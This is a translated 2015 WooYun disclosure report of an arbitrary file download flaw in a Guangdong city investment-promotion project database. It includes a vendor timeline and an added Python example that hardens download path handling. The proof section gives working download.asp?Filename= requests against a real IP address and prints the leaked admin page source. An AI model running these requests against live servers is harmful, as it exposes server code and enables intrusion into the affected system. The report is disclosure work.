
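Vulnerability summary

Bug ID: wooyun-2015-0104491

Title: Arbitrary file download and viewing in the project data system of a domestic-investment economic promotion center of a city in Guangdong Province

Related vendor: Guangdong Provincial Information Security Evaluation Center

Author: 一刀

Submitted: 2015-03-31 10:27

Fixed: 2015-05-15 15:58

Published: 2015-05-15 15:58

Vulnerability type:

Severity: Low

Self-assessed Rank: 1

Vulnerability status: Handed over to a third-party partner organization (Guangdong Provincial Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]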



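Vulnerability details

Disclosure status:

2015-03-31: Details reported to the vendor; awaiting vendor handling
2015-03-31: Vendor has confirmed; details disclosed to the vendor only
2015-04-10: Details disclosed to core white hats and experts in related fields
2015-04-20: Details disclosed to regular white hats
2015-04-30: Details disclosed to intern white hats
2015-05-15: Details disclosed to the public

Brief description:

Actually, this system has previously had weak-password login or universal-password login issues, and now a WAF has been added.

Detailed description:

Previous vulnerability: WooYun: Weak password, continued, in the project data system of a domestic-investment economic promotion center of a city in Guangdong Province (involving a large number of projects worth hundreds of millions of yuan)
A firewall has now been added. I just hope the vendor will give me an invitation code; this vulnerability is not a duplicate!

Proof of vulnerability:

Arbitrary file viewing, admin/login.asp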
218.16.125.82:8081/download.asp?Filename=admin/login.asp
code:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html>
Contents of admin/upload.asp
218.16.125.82:8081/download.asp?Filename=/admin/upload.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%
'----------------------------------------------------------
'************** ���� ASP �������ϴ��� V2.11 ***************
'�÷�����������Ӧ��[���Ӳ�Ʒһ]
'������Ҫ˵��Ĭ��ģʽ�µ�����
'�Գ����IJ�Ʒ����Ϊ��<br>
'������UTF-8�ַ�������
'�������ϴ�����(upload.asp)�Ĵ�����ע��
'**********************************************************
'----------------------------------------------------------
OPTION EXPLICIT
Server.ScriptTimeOut=5000
%>
<!--#include file="UpLoadClass.asp"-->
<%
dim request2
'�����ϴ�����
set request2=New UpLoadClass
'�����ַ���
request2.Charset="gb2312"
'�

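Remediation:

Although the issue is not a big one, please reward me with an invitation code! Digging these up is hard work for us too!
You understand the fix better than I do.

Copyright notice: when reposting, please credit the source 一刀@乌云 (WooYun)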
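
Added example, not part of the original report and not the affected system's code: the two requests in the proof succeed because download.asp returns whatever path the Filename parameter names. The Python below contrasts that assumed behaviour with a resolver that confines downloads to one directory and an extension allowlist; the `files` directory, the allowlist and the sample tree are constructed assumptions.

```python
import os
import tempfile

# Assumed policy: only document types are ever served (hypothetical allowlist).
ALLOWED_EXT = {".pdf", ".doc", ".xls", ".zip"}

def naive_resolve(webroot, filename):
    """Behaviour implied by the report: Filename is mapped under the web root as-is."""
    return os.path.join(webroot, filename.lstrip("/\\"))

def safe_resolve(download_dir, filename):
    """Return the real path of a servable file inside download_dir, else None."""
    if not filename or "\x00" in filename:
        return None
    name = filename.replace("\\", "/")  # IIS accepts both separators
    if name.startswith("/") or ":" in name:  # absolute path, drive letter, NTFS stream
        return None
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        return None  # server-side scripts such as .asp are never served as downloads
    root = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(root, name))
    # Containment is checked after canonicalisation, so ../ and symlinks cannot escape.
    if os.path.commonpath([root, target]) != root:
        return None
    return target if os.path.isfile(target) else None

def build_sample_site():
    """Constructed web root: scripts and an archive under admin/, a document under files/."""
    webroot = tempfile.mkdtemp()
    for rel in ("admin/login.asp", "admin/upload.asp", "admin/export.zip", "files/report.pdf"):
        path = os.path.join(webroot, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    return webroot

def check_requests(webroot):
    """Hardened decision for the report's two Filename values and two constructed ones."""
    downloads = os.path.join(webroot, "files")
    names = ("admin/login.asp", "/admin/upload.asp", "../admin/export.zip", "report.pdf")
    return {n: safe_resolve(downloads, n) is not None for n in names}

if __name__ == "__main__":
    site = build_sample_site()
    print("naive handler finds:", os.path.isfile(naive_resolve(site, "admin/login.asp")))
    print("hardened handler serves:", check_requests(site))
```

The same three checks (extension allowlist, canonicalise, then verify containment in a dedicated download directory) carry over to a classic ASP handler; a WAF in front of the application does not replace them.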


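Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmation time: 2015-03-31 15:56

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: Medium
Attack cost: Low
Impact caused: Medium
Overall rating: Medium, rank: 5
We are contacting the organization that manages the website to handle it.

Latest status:

None yet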